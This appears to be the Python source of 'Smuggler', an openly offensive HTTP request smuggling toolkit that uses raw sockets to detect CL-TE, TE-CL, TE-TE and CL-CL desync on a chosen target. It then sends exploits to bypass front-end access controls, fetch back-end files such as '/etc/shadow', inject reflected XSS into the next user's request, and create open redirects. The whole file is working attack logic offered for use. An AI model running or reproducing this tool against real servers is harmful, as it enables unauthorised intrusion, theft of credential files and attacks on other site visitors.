smuggler.py 32 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020/2022 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. import sys, socket, ssl
  10. VERSION = "v:0.4"
  11. RELEASE = "09122022"
  12. SOURCE1 = "https://code.03c8.net/epsylon/smuggler"
  13. SOURCE2 = "https://github.com/epsylon/smuggler"
  14. CONTACT = "epsylon@riseup.net - (https://03c8.net)"
  15. try:
  16. import payloads.payloads # import payloads
  17. except:
  18. print ("\n[Info] Try to run the tool with Python3.x.y... (ex: python3 smuggler.py) -> [EXITING!]\n")
  19. sys.exit()
  20. VULNERABLE_LIST = []
  21. def set_target():
  22. target = input("\n + Enter TARGET (ex: 'http(s)://www.evilcorp.com'): ").lower()
  23. if target.startswith("http://"):
  24. target = target.replace("http://","")
  25. port = 80
  26. SSL = False
  27. elif target.startswith("https://"):
  28. target = target.replace("https://","")
  29. port = 443
  30. SSL = True
  31. else:
  32. print("\n"+"-"*45)
  33. print("\n[Error] Target is invalid: '"+str(target)+"'\n")
  34. print("-"*45)
  35. sys.exit()
  36. method = input("\n + Enter HTTP METHOD (default: 'POST'): ").upper()
  37. if method == "GET" or method == "POST":
  38. pass
  39. else:
  40. if method == "":
  41. method = "POST"
  42. else:
  43. print("\n"+"-"*45)
  44. print("\n[Error] Method is invalid: '"+str(method)+"'\n")
  45. print("-"*45)
  46. sys.exit()
  47. protocol = input("\n + Enter PROTOCOL (default: 'HTTP/1.1'): ")
  48. if protocol == "":
  49. protocol = "HTTP/1.1"
  50. path = input("\n + Enter PATH (default: '/'): ")
  51. if path == "":
  52. path = "/"
  53. cookie = input("\n + Enter COOKIE (ex: 'session=iLxgKt7w3FIKor1csjB5HYbPrq9evRhb;'): ")
  54. return target, port, SSL, method, protocol, path, cookie
  55. def detect(final): # detect menu
  56. target, port, SSL, method, protocol, path, cookie = set_target() # set target
  57. print("\n"+"="*50 + "\n")
  58. print("[Info] Starting -HTTP Smuggling- Timing detection ...")
  59. payloads_dsync = payloads.payloads.payloads # load payloads
  60. if target.endswith("/"):
  61. target = target.replace("/", "")
  62. addr = (target, port)
  63. print("")
  64. for payload in payloads_dsync:
  65. attack_type = payload.split("#")[0]
  66. payload_type = payload.split("#")[1]
  67. for i in range(0,2): # send payload twice
  68. print("="*50)
  69. print("Trying payload: ["+str(attack_type)+"] ["+str(i+1)+"/2]")
  70. print("="*50+"\n")
  71. if cookie is not "":
  72. payload = method+" "+path+" "+protocol+"\r\nHost: "+target+"\r\nCookie: "+cookie+"\r\n"+payload_type # main smuggling payload + cookie
  73. else:
  74. payload = method+" "+path+" "+protocol+"\r\nHost: "+target+"\r\n"+payload_type # main smuggling payload
  75. print("+ PAYLOAD:\n")
  76. print(payload)
  77. send_payload(attack_type, payload, addr, SSL) # send each payload
  78. if final == True:
  79. show_final_results(target, port, protocol, method, path, final)
  80. else:
  81. t, p, pr, m, pt = show_final_results(target, port, protocol, method, path, final)
  82. return t, p, pr, m, pt, SSL
  83. def send_payload(attack_type, payload, addr, SSL):
  84. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  85. if SSL == True: # ssl
  86. ss = ssl.wrap_socket(s)
  87. try:
  88. if SSL == True: # ssl
  89. ss.connect(addr)
  90. else:
  91. s.connect(addr)
  92. except Exception as e:
  93. print("-"*45)
  94. print("[Error] Generating socket... -> [PASSING!]")
  95. print(e)
  96. print("-"*45+"\n")
  97. if SSL == True: # ssl
  98. ss.close()
  99. else:
  100. s.close()
  101. return
  102. for i in range(0,10): # x10 tests
  103. if SSL == True: # ssl
  104. ss.send(payload.encode('utf-8'))
  105. else:
  106. s.send(payload.encode('utf-8'))
  107. datas=""
  108. while 1:
  109. if SSL == True: # ssl
  110. data = ss.recv(1024)
  111. else:
  112. data = s.recv(1024)
  113. if not data:
  114. break
  115. try:
  116. datas += str(data.decode('utf-8'))
  117. except:
  118. pass
  119. print("\n+ REPLY:\n")
  120. print(str(datas))
  121. print("")
  122. resp_c=0
  123. resp=""
  124. wait=False
  125. for line in datas.split('\n'):
  126. if "502" in line or "501" in line or "404" in line or "405" in line or "403" in line or "400" in line:
  127. wait=False
  128. resp_c+=1
  129. else:
  130. wait=True
  131. if not wait:
  132. resp += line+'\n'
  133. print("-"*45)
  134. if resp_c > 0 and "Unrecognized method" in str(datas) or resp_c > 0 and "not supported for current URL" in str(datas):
  135. print ("PAYLOAD: ["+str(attack_type)+"] is WORKING! ;-)")
  136. if attack_type not in VULNERABLE_LIST:
  137. VULNERABLE_LIST.append(attack_type) # add attack type for results
  138. else:
  139. print ("PAYLOAD: ["+str(attack_type)+"] is NOT working...")
  140. print("-"*45+"\n")
  141. if SSL == True: # ssl
  142. ss.close()
  143. else:
  144. s.close()
  145. def show_final_results(target, port, protocol, method, path, final):
  146. print("="*50)
  147. print("\n+ Detection RESULT: -HTTP Smuggling- Timing Attack\n")
  148. print("-"*45+"\n")
  149. print(" - TARGET: "+str(target)+":"+str(port))
  150. print(" - Method: "+str(method))
  151. print(" - Protocol: "+str(protocol))
  152. print(" - Path : "+str(path))
  153. TETE = False
  154. TECL = False
  155. CLTE = False
  156. CLCL = False
  157. if VULNERABLE_LIST:
  158. print("\n - STATUS: [ VULNERABLE !!! ]\n")
  159. for v in VULNERABLE_LIST: # resume vulnerable payloads found
  160. if v.startswith("TE-TE") and TETE == False: # TE-TE
  161. print(" * [TE-TE]: [Front-end: Transfer-Encoding] <-> [Back-end: Transfer-Encoding]")
  162. TETE = True
  163. elif v.startswith("TE-CL") and TECL == False: # TE-CL
  164. print(" * [TE-CL]: [Front-end: Transfer-Encoding] <-> [Back-end: Content-Length]")
  165. TECL = True
  166. elif v.startswith("CL-TE") and CLTE == False: # CL-TE
  167. print(" * [CL-TE]: [Front-end: Content-Length] <-> [Back-end: Transfer-Encoding]")
  168. CLTE = True
  169. elif v.startswith("CL-CL") and CLCL == False: # CL-CL
  170. print(" * [CL-CL]: [Front-end: Content-Length] <-> [Back-end: Content-Length]")
  171. CLCL = True
  172. else:
  173. print("\n - STATUS: [ NOT VULNERABLE ]")
  174. print("\n"+"="*50+"\n")
  175. sys.exit() # exit when not vulnerable!
  176. if final == False: # keep exploiting
  177. return target, port, protocol, method, path
  178. print("\n"+"="*50+"\n")
  179. def manual(): # manual exploiting menu
  180. exploit_type = "MANUAL"
  181. exploit_path = input("\n+ SELECT PATH TO EXPLOIT CODE (default: 'payloads/dummy.txt')")
  182. if exploit_path == "":
  183. exploit_path = "payloads/dummy.txt"
  184. print("\n"+"="*50 + "\n")
  185. print("[Info] Trying to EXPLOIT your own CODE (input: '"+exploit_path+"')...")
  186. target, port, protocol, method, path, SSL = detect(False) # set target
  187. addr = (target, port)
  188. f = open(exploit_path, "r")
  189. exploit = f.read()
  190. f.close()
  191. print("\n"+"-"*45)
  192. for v in VULNERABLE_LIST:
  193. print("="*50+"\n")
  194. print("+ PAYLOAD TYPE: ["+exploit_type+"]")
  195. print("+ EXPLOIT CODE:\n")
  196. print(str(exploit))
  197. send_exploit(addr, SSL, exploit, exploit_type, "MANUAL") # send exploit
  198. def exploit(): # exploit menu
  199. exploit = input("\n+ SELECT EXPLOIT:\n\n [0] SMG-VER-01: VERIFY that your 'chunked' requests are arriving correctly\n [1] SMG-REV-01: REVEAL if the front-end performs some REWRITING of requests before they are forwarded to the back-end\n [2] SMG-ACL-01: GRANT ACCESS to a RESTRICTED URL (ex: '/restricted/salaries/boss.php', '/admin/', '/private/messages' ...)\n [3] SMG-GET-01: GET a FILE from the back-end server (ex: '/etc/shadow', '/server/config_db.php' ...)\n [4] SMG-XSS-01: INJECT a (simple) reflected XSS in the back-end (exploit 'User-Agent', 'Referer' vulnerability) and append it to the next user's request\n [5] SMG-UFO-01: TURN an 'on-site' redirect into an OPEN REDIRECT and append it to the next user's request\n\n")
  200. if exploit == "0": # verify acccess (back-end)
  201. exploit_verify()
  202. elif exploit == "1": # reveal (front-end)
  203. exploit_reveal()
  204. elif exploit == "2": # bypass (front-end)
  205. exploit_bypass()
  206. elif exploit == "3": # fetch files (back-end)
  207. exploit_steal()
  208. elif exploit == "4": # reflected XSS (back-end)
  209. exploit_XSS()
  210. elif exploit == "5": # open redirect (back-end)
  211. exploit_openredirect()
  212. else: # exit
  213. print ("[Info] Not any valid exploit selected... -> [EXITING!]\n")
  214. sys.exit()
  215. def send_exploit(addr, SSL, exploit, exploit_type, exploit_mode):
  216. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  217. if SSL == True: # ssl
  218. ss = ssl.wrap_socket(s)
  219. try:
  220. if SSL == True: # ssl
  221. ss.connect(addr)
  222. else:
  223. s.connect(addr)
  224. except Exception as e:
  225. print("-"*45)
  226. print("[Error] Generating socket... -> [PASSING!]")
  227. print(e)
  228. print("-"*45+"\n")
  229. if SSL == True: # ssl
  230. ss.close()
  231. else:
  232. s.close()
  233. return
  234. for i in range(0,2): # send exploit twice
  235. if SSL == True: # ssl
  236. ss.send(exploit.encode('utf-8'))
  237. else:
  238. s.send(exploit.encode('utf-8'))
  239. datas=""
  240. while 1:
  241. if SSL == True: # ssl
  242. data = ss.recv(1024)
  243. else:
  244. data = s.recv(1024)
  245. if not data:
  246. break
  247. try:
  248. datas += str(data.decode('utf-8'))
  249. except:
  250. pass
  251. print("\n"+"-"*45)
  252. print("\n+ REPLY:\n")
  253. print(str(datas))
  254. if exploit_mode == "VERIFY":
  255. print("\n"+"-"*45)
  256. print("\n[Info] This exploit ["+exploit_type+"] is working!!! ;-) \n")
  257. if SSL == True: # ssl
  258. ss.close()
  259. else:
  260. s.close()
  261. def exploit_verify():
  262. print("\n"+"="*50 + "\n")
  263. print("[Info] Trying to VERIFY injections (generating back-end errors)...")
  264. target, port, protocol, method, path, SSL = detect(False) # set target
  265. addr = (target, port)
  266. print("\n"+"-"*45)
  267. exploits_dsync = payloads.payloads.exploits # load exploits
  268. smuggled_method = payloads.payloads.methods # load methods
  269. for v in VULNERABLE_LIST:
  270. for exp in exploits_dsync:
  271. if exp.split("#")[0] in v:
  272. for s in smuggled_method:
  273. if s.split("#")[0] == "0": # verify reading
  274. s = s.replace("$method", method)
  275. s = s.replace("$path", path)
  276. s = s.replace("$protocol", protocol)
  277. s = s.replace("$target", target)
  278. smuggled = s.split("#")[1].replace("\n","")
  279. exploit = exp.split("#")[1]
  280. exploit = exploit.replace("$method", method)
  281. exploit = exploit.replace("$path", path)
  282. exploit = exploit.replace("$protocol", protocol)
  283. exploit = exploit.replace("$target", target)
  284. exploit_type = str(exp.split("#")[0])
  285. content_length2 = ""
  286. if exploit_type == "CL-TE-0":
  287. content_length = len(smuggled)+5 #CL-TE-0
  288. elif exploit_type == "CL-TE-1":
  289. content_length = len(smuggled)+4 #CL-TE-1
  290. elif exploit_type == "CL-CL-0":
  291. content_length = len(smuggled)-1 #CL-CL-0
  292. elif exploit_type == "CL-CL-1":
  293. content_length = len(smuggled)-1 #CL-CL-1
  294. content_length2 = len(smuggled)-1
  295. exploit = exploit.replace("$LC", str(content_length2))
  296. elif exploit_type == "CL-CL-2":
  297. content_length = len(smuggled)-1 #CL-CL-2
  298. content_length2 = len(smuggled)+1
  299. exploit = exploit.replace("$LC", str(content_length2))
  300. elif exploit_type == "TE-CL-0":
  301. content_length = len(smuggled)+3 #TE-CL-0
  302. elif exploit_type == "TE-CL-1":
  303. content_length = len(smuggled)+2 #TE-CL-1
  304. elif exploit_type == "TE-TE-0":
  305. content_length = len(smuggled)-1 #TE-TE-0
  306. content_length2 = len(smuggled)-1
  307. exploit = exploit.replace("$LC", str(content_length2))
  308. elif exploit_type == "TE-TE-1":
  309. content_length = len(smuggled)-1 #TE-TE-1
  310. content_length2 = len(smuggled)+1
  311. elif exploit_type == "TE-TE-2":
  312. content_length = len(smuggled)-1 #TE-TE-2
  313. content_length2 = len(smuggled)+1
  314. exploit = exploit.replace("$CL", str(content_length))
  315. exploit = exploit.replace("$SMUGGLED", smuggled)
  316. print("="*50+"\n")
  317. print("+ PAYLOAD TYPE: ["+exploit_type+"]")
  318. print("+ EXPLOIT CODE:\n")
  319. print(str(exploit))
  320. send_exploit(addr, SSL, exploit, exploit_type, "VERIFY") # send exploit
  321. def exploit_reveal():
  322. print("\n"+"="*50 + "\n")
  323. print("[Info] Trying to REVEAL front-end REWRITING...")
  324. target, port, protocol, method, path, SSL = detect(False) # set target
  325. addr = (target, port)
  326. print("\n"+"-"*45)
  327. print("\n"+"="*50)
  328. print("[Info] Exploiting front-end REWRITING...")
  329. print("="*50)
  330. parameter = input("\n + Enter PARAMETER (ex: 'q', '_username', 'search' ...): ")
  331. exploits_dsync = payloads.payloads.exploits # load exploits
  332. smuggled_method = payloads.payloads.methods # load methods
  333. for v in VULNERABLE_LIST:
  334. for exp in exploits_dsync:
  335. if exp.split("#")[0] in v:
  336. for s in smuggled_method:
  337. if s.split("#")[0] == "1": # reveal rewriting
  338. s = s.replace("$method", method)
  339. s = s.replace("$path", path)
  340. s = s.replace("$protocol", protocol)
  341. s = s.replace("$target", target)
  342. s = s.replace("$parameter", parameter)
  343. content_length = len(parameter)+2+50
  344. s = s.replace("$CL", str(content_length))
  345. smuggled = s.split("#")[1]
  346. s = s.replace("$SMUGGLED", smuggled)
  347. exploit = exp.split("#")[1]
  348. exploit = exploit.replace("$method", method)
  349. exploit = exploit.replace("$path", path)
  350. exploit = exploit.replace("$protocol", protocol)
  351. exploit = exploit.replace("$target", target)
  352. exploit = exploit.replace("$parameter", parameter)
  353. exploit = exploit.replace("$SMUGGLED", smuggled)
  354. exploit_type = str(exp.split("#")[0])
  355. content_length2 = ""
  356. if exploit_type == "CL-TE-0":
  357. content_length = len(smuggled)+5 #CL-TE-0
  358. elif exploit_type == "CL-TE-1":
  359. content_length = len(smuggled)+4 #CL-TE-1
  360. elif exploit_type == "CL-CL-0":
  361. content_length = len(smuggled)-1 #CL-CL-0
  362. elif exploit_type == "CL-CL-1":
  363. content_length = len(smuggled)-1 #CL-CL-1
  364. content_length2 = len(smuggled)-1
  365. exploit = exploit.replace("$LC", str(content_length2))
  366. elif exploit_type == "CL-CL-2":
  367. content_length = len(smuggled)-1 #CL-CL-2
  368. content_length2 = len(smuggled)+1
  369. exploit = exploit.replace("$LC", str(content_length2))
  370. elif exploit_type == "TE-CL-0":
  371. content_length = len(smuggled)+3 #TE-CL-0
  372. elif exploit_type == "TE-CL-1":
  373. content_length = len(smuggled)+2 #TE-CL-1
  374. elif exploit_type == "TE-TE-0":
  375. content_length = len(smuggled)-1 #TE-TE-0
  376. content_length2 = len(smuggled)-1
  377. exploit = exploit.replace("$LC", str(content_length2))
  378. elif exploit_type == "TE-TE-1":
  379. content_length = len(smuggled)-1 #TE-TE-1
  380. content_length2 = len(smuggled)+1
  381. elif exploit_type == "TE-TE-2":
  382. content_length = len(smuggled)-1 #TE-TE-2
  383. content_length2 = len(smuggled)+1
  384. exploit = exploit.replace("$CL", str(content_length))
  385. exploit = exploit.replace("$SMUGGLED", smuggled)
  386. print("\n"+"="*50+"\n")
  387. print("+ PAYLOAD TYPE: ["+exploit_type+"]")
  388. print("+ EXPLOIT CODE:\n")
  389. print(str(exploit))
  390. send_exploit(addr, SSL, exploit, exploit_type, "REVEAL") # send exploit
  391. def exploit_bypass():
  392. print("\n"+"="*50 + "\n")
  393. print("[Info] Trying to REVEAL front-end REWRITING...")
  394. target, port, protocol, method, path, SSL = detect(False) # set target
  395. addr = (target, port)
  396. print("\n"+"-"*45)
  397. print("\n"+"="*50)
  398. restricted = input("\n + Enter RESTRICTED ZONE (ex: '/restricted/salaries/boss.php', '/wp-admin/', '/private/messages'...): ")
  399. exploits_dsync = payloads.payloads.exploits # load exploits
  400. smuggled_method = payloads.payloads.methods # load methods
  401. for v in VULNERABLE_LIST:
  402. for exp in exploits_dsync:
  403. if exp.split("#")[0] in v:
  404. for s in smuggled_method:
  405. if s.split("#")[0] == "2": # bypass ACLs
  406. s = s.replace("$method", method)
  407. s = s.replace("$path", path)
  408. s = s.replace("$protocol", protocol)
  409. s = s.replace("$target", target)
  410. s = s.replace("$restricted", restricted)
  411. content_length = 10 # $CL method
  412. s = s.replace("$CL", str(content_length))
  413. smuggled = s.split("#")[1]
  414. exploit = exp.split("#")[1]
  415. exploit = exploit.replace("$method", method)
  416. exploit = exploit.replace("$path", path)
  417. exploit = exploit.replace("$protocol", protocol)
  418. exploit = exploit.replace("$target", target)
  419. exploit = exploit.replace("$restricted", restricted)
  420. exploit_type = str(exp.split("#")[0])
  421. content_length2 = ""
  422. if exploit_type == "CL-TE-0":
  423. content_length = len(smuggled)+5 #CL-TE-0
  424. elif exploit_type == "CL-TE-1":
  425. content_length = len(smuggled)+4 #CL-TE-1
  426. elif exploit_type == "CL-CL-0":
  427. content_length = len(smuggled)-1 #CL-CL-0
  428. elif exploit_type == "CL-CL-1":
  429. content_length = len(smuggled)-1 #CL-CL-1
  430. content_length2 = len(smuggled)-1
  431. exploit = exploit.replace("$LC", str(content_length2))
  432. elif exploit_type == "CL-CL-2":
  433. content_length = len(smuggled)-1 #CL-CL-2
  434. content_length2 = len(smuggled)+1
  435. exploit = exploit.replace("$LC", str(content_length2))
  436. elif exploit_type == "TE-CL-0":
  437. content_length = len(smuggled)+3 #TE-CL-0
  438. elif exploit_type == "TE-CL-1":
  439. content_length = len(smuggled)+2 #TE-CL-1
  440. elif exploit_type == "TE-TE-0":
  441. content_length = len(smuggled)-1 #TE-TE-0
  442. content_length2 = len(smuggled)-1
  443. exploit = exploit.replace("$LC", str(content_length2))
  444. elif exploit_type == "TE-TE-1":
  445. content_length = len(smuggled)-1 #TE-TE-1
  446. content_length2 = len(smuggled)+1
  447. elif exploit_type == "TE-TE-2":
  448. content_length = len(smuggled)-1 #TE-TE-2
  449. content_length2 = len(smuggled)+1
  450. exploit = exploit.replace("$CL", str(content_length))
  451. exploit = exploit.replace("$SMUGGLED", smuggled)
  452. print("\n"+"="*50+"\n")
  453. print("+ PAYLOAD TYPE: ["+exploit_type+"]")
  454. print("+ EXPLOIT CODE:\n")
  455. print(str(exploit))
  456. send_exploit(addr, SSL, exploit, exploit_type, "BYPASS") # send exploit
  457. def exploit_steal():
  458. print("\n"+"="*50 + "\n")
  459. print("[Info] Trying to GET FILE from server...")
  460. target, port, protocol, method, path, SSL = detect(False) # set target
  461. addr = (target, port)
  462. print("\n"+"-"*45)
  463. files = input("\n + Enter FILE (ex: '/etc/shadow', '/server/config_db.php' ...): ")
  464. exploits_dsync = payloads.payloads.exploits # load exploits
  465. smuggled_method = payloads.payloads.methods # load methods
  466. for v in VULNERABLE_LIST:
  467. for exp in exploits_dsync:
  468. if exp.split("#")[0] in v:
  469. for s in smuggled_method:
  470. if s.split("#")[0] == "3": # fetch files
  471. s = s.replace("$method", method)
  472. s = s.replace("$path", path)
  473. s = s.replace("$protocol", protocol)
  474. s = s.replace("$target", target)
  475. s = s.replace("$files", files)
  476. content_length = len(files)+2 # p=len(files)
  477. s = s.replace("$CL", str(content_length))
  478. smuggled = s.split("#")[1]
  479. exploit = exp.split("#")[1]
  480. exploit = exploit.replace("$method", method)
  481. exploit = exploit.replace("$path", path)
  482. exploit = exploit.replace("$protocol", protocol)
  483. exploit = exploit.replace("$target", target)
  484. exploit = exploit.replace("$files", files)
  485. exploit_type = str(exp.split("#")[0])
  486. content_length2 = ""
  487. if exploit_type == "CL-TE-0":
  488. content_length = len(smuggled)+5 #CL-TE-0
  489. elif exploit_type == "CL-TE-1":
  490. content_length = len(smuggled)+4 #CL-TE-1
  491. elif exploit_type == "CL-CL-0":
  492. content_length = len(smuggled)-1 #CL-CL-0
  493. elif exploit_type == "CL-CL-1":
  494. content_length = len(smuggled)-1 #CL-CL-1
  495. content_length2 = len(smuggled)-1
  496. exploit = exploit.replace("$LC", str(content_length2))
  497. elif exploit_type == "CL-CL-2":
  498. content_length = len(smuggled)-1 #CL-CL-2
  499. content_length2 = len(smuggled)+1
  500. exploit = exploit.replace("$LC", str(content_length2))
  501. elif exploit_type == "TE-CL-0":
  502. content_length = len(smuggled)+3 #TE-CL-0
  503. elif exploit_type == "TE-CL-1":
  504. content_length = len(smuggled)+2 #TE-CL-1
  505. elif exploit_type == "TE-TE-0":
  506. content_length = len(smuggled)-1 #TE-TE-0
  507. content_length2 = len(smuggled)-1
  508. exploit = exploit.replace("$LC", str(content_length2))
  509. elif exploit_type == "TE-TE-1":
  510. content_length = len(smuggled)-1 #TE-TE-1
  511. content_length2 = len(smuggled)+1
  512. elif exploit_type == "TE-TE-2":
  513. content_length = len(smuggled)-1 #TE-TE-2
  514. content_length2 = len(smuggled)+1
  515. exploit = exploit.replace("$CL", str(content_length))
  516. exploit = exploit.replace("$SMUGGLED", smuggled)
  517. print("\n"+"="*50+"\n")
  518. print("+ PAYLOAD TYPE: ["+exploit_type+"]")
  519. print("+ EXPLOIT CODE:\n")
  520. print(str(exploit))
  521. send_exploit(addr, SSL, exploit, exploit_type, "STEAL") # send exploit
  522. def exploit_XSS():
  523. print("\n"+"="*50 + "\n")
  524. print("[Info] Trying to EXPLOIT a (simple) reflected XSS in the back-end (User-Agent, Referer)...")
  525. target, port, protocol, method, path, SSL = detect(False) # set target
  526. addr = (target, port)
  527. print("\n"+"-"*45)
  528. text = input("\n + Enter TEXT (ex: 'XSS', '0wNed by ANONYMOUS', ...): ")
  529. exploits_dsync = payloads.payloads.exploits # load exploits
  530. smuggled_method = payloads.payloads.methods # load methods
  531. for v in VULNERABLE_LIST:
  532. for exp in exploits_dsync:
  533. if exp.split("#")[0] in v:
  534. for s in smuggled_method:
  535. if s.split("#")[0] == "4": # reflected XSS
  536. s = s.replace("$method", method)
  537. s = s.replace("$path", path)
  538. s = s.replace("$protocol", protocol)
  539. s = s.replace("$target", target)
  540. s = s.replace("$text", text)
  541. content_length = len(text)-1
  542. s = s.replace("$CL", str(content_length))
  543. smuggled = s.split("#")[1]
  544. exploit = exp.split("#")[1]
  545. exploit = exploit.replace("$method", method)
  546. exploit = exploit.replace("$path", path)
  547. exploit = exploit.replace("$protocol", protocol)
  548. exploit = exploit.replace("$target", target)
  549. exploit = exploit.replace("$text", text)
  550. exploit_type = str(exp.split("#")[0])
  551. content_length2 = ""
  552. if exploit_type == "CL-TE-0":
  553. content_length = len(smuggled)+5 #CL-TE-0
  554. elif exploit_type == "CL-TE-1":
  555. content_length = len(smuggled)+4 #CL-TE-1
  556. elif exploit_type == "CL-CL-0":
  557. content_length = len(smuggled)-1 #CL-CL-0
  558. elif exploit_type == "CL-CL-1":
  559. content_length = len(smuggled)-1 #CL-CL-1
  560. content_length2 = len(smuggled)-1
  561. exploit = exploit.replace("$LC", str(content_length2))
  562. elif exploit_type == "CL-CL-2":
  563. content_length = len(smuggled)-1 #CL-CL-2
  564. content_length2 = len(smuggled)+1
  565. exploit = exploit.replace("$LC", str(content_length2))
  566. elif exploit_type == "TE-CL-0":
  567. content_length = len(smuggled)+3 #TE-CL-0
  568. elif exploit_type == "TE-CL-1":
  569. content_length = len(smuggled)+2 #TE-CL-1
  570. elif exploit_type == "TE-TE-0":
  571. content_length = len(smuggled)-1 #TE-TE-0
  572. content_length2 = len(smuggled)-1
  573. exploit = exploit.replace("$LC", str(content_length2))
  574. elif exploit_type == "TE-TE-1":
  575. content_length = len(smuggled)-1 #TE-TE-1
  576. content_length2 = len(smuggled)+1
  577. elif exploit_type == "TE-TE-2":
  578. content_length = len(smuggled)-1 #TE-TE-2
  579. content_length2 = len(smuggled)+1
  580. exploit = exploit.replace("$CL", str(content_length))
  581. exploit = exploit.replace("$SMUGGLED", smuggled)
  582. print("\n"+"="*50+"\n")
  583. print("+ PAYLOAD TYPE: ["+exploit_type+"]")
  584. print("+ EXPLOIT CODE:\n")
  585. print(str(exploit))
  586. send_exploit(addr, SSL, exploit, exploit_type, "XSS") # send exploit
  587. def exploit_openredirect():
  588. print("\n"+"="*50 + "\n")
  589. print("[Info] Trying to turn an 'on-site' redirect into an OPEN REDIRECT...")
  590. target, port, protocol, method, path, SSL = detect(False) # set target
  591. addr = (target, port)
  592. print("\n"+"-"*45)
  593. path2 = input("\n + Enter 'on-site' URL (ex: '/', '/login', '/restricted', ...): ")
  594. redirect = input("\n + Enter URL to redirect (ex: 'attacker-website.com' ...): ")
  595. exploits_dsync = payloads.payloads.exploits # load exploits
  596. smuggled_method = payloads.payloads.methods # load methods
  597. for v in VULNERABLE_LIST:
  598. for exp in exploits_dsync:
  599. if exp.split("#")[0] in v:
  600. for s in smuggled_method:
  601. if s.split("#")[0] == "5": # open redirect
  602. s = s.replace("$method", method)
  603. s = s.replace("$path", path)
  604. s = s.replace("$protocol", protocol)
  605. s = s.replace("$target", target)
  606. s = s.replace("$redirect", redirect)
  607. s = s.replace("$PT", path2)
  608. content_length = len(redirect)+1
  609. s = s.replace("$CL", str(content_length))
  610. smuggled = s.split("#")[1]
  611. exploit = exp.split("#")[1]
  612. exploit = exploit.replace("$method", method)
  613. exploit = exploit.replace("$path", path)
  614. exploit = exploit.replace("$protocol", protocol)
  615. exploit = exploit.replace("$target", target)
  616. exploit = exploit.replace("$redirect", redirect)
  617. exploit = exploit.replace("$PT", path2)
  618. exploit_type = str(exp.split("#")[0])
  619. content_length2 = ""
  620. if exploit_type == "CL-TE-0":
  621. content_length = len(smuggled)+5 #CL-TE-0
  622. elif exploit_type == "CL-TE-1":
  623. content_length = len(smuggled)+4 #CL-TE-1
  624. elif exploit_type == "CL-CL-0":
  625. content_length = len(smuggled)-1 #CL-CL-0
  626. elif exploit_type == "CL-CL-1":
  627. content_length = len(smuggled)-1 #CL-CL-1
  628. content_length2 = len(smuggled)-1
  629. exploit = exploit.replace("$LC", str(content_length2))
  630. elif exploit_type == "CL-CL-2":
  631. content_length = len(smuggled)-1 #CL-CL-2
  632. content_length2 = len(smuggled)+1
  633. exploit = exploit.replace("$LC", str(content_length2))
  634. elif exploit_type == "TE-CL-0":
  635. content_length = len(smuggled)+3 #TE-CL-0
  636. elif exploit_type == "TE-CL-1":
  637. content_length = len(smuggled)+2 #TE-CL-1
  638. elif exploit_type == "TE-TE-0":
  639. content_length = len(smuggled)-1 #TE-TE-0
  640. content_length2 = len(smuggled)-1
  641. exploit = exploit.replace("$LC", str(content_length2))
  642. elif exploit_type == "TE-TE-1":
  643. content_length = len(smuggled)-1 #TE-TE-1
  644. content_length2 = len(smuggled)+1
  645. elif exploit_type == "TE-TE-2":
  646. content_length = len(smuggled)-1 #TE-TE-2
  647. content_length2 = len(smuggled)+1
  648. exploit = exploit.replace("$CL", str(content_length))
  649. exploit = exploit.replace("$SMUGGLED", smuggled)
  650. print("\n"+"="*50+"\n")
  651. print("+ PAYLOAD TYPE: ["+exploit_type+"]")
  652. print("+ EXPLOIT CODE:\n")
  653. print(str(exploit))
  654. send_exploit(addr, SSL, exploit, exploit_type, "REDIRECT") # send exploit
  655. def print_banner():
  656. print("\n"+"="*50)
  657. print(" ____ __ __ _ _ ____ ____ _ _____ ____ ")
  658. print("/ ___|| \/ | | | |/ ___|/ ___| | | ____| _ \ ")
  659. print("\___ \| |\/| | | | | | _| | _| | | _| | |_) |")
  660. print(" ___) | | | | |_| | |_| | |_| | |___| |___| _ < ")
  661. print("|____/|_| |_|\___/ \____|\____|_____|_____|_| \_\ by psy")
  662. print('\n"HTTP -Smuggling- (DSYNC) Attacking Toolkit"')
  663. print("\n"+"-"*15+"\n")
  664. print(" * VERSION: ")
  665. print(" + "+VERSION+" - (rev:"+RELEASE+")")
  666. print("\n * SOURCES:")
  667. print(" + "+SOURCE1)
  668. print(" + "+SOURCE2)
  669. print("\n * CONTACT: ")
  670. print(" + "+CONTACT+"\n")
  671. print("-"*15+"\n")
  672. print("="*50)
  673. # sub_init #
  674. print_banner() # show banner
  675. option = input("\n+ CHOOSE: (D)etect or (E)ploit: ").upper()
  676. print("\n"+"="*50)
  677. if option == "D": # detecting phase
  678. detect(True) # only detect
  679. elif option == "E": # trying to exploit
  680. exp_type = input("\n+ CHOOSE: (A)utomatic or (M)anual: ").upper()
  681. print("\n"+"="*50)
  682. if exp_type == "M": # trying manual payload
  683. manual()
  684. else: # automatic exploits
  685. exploit()
  686. else:
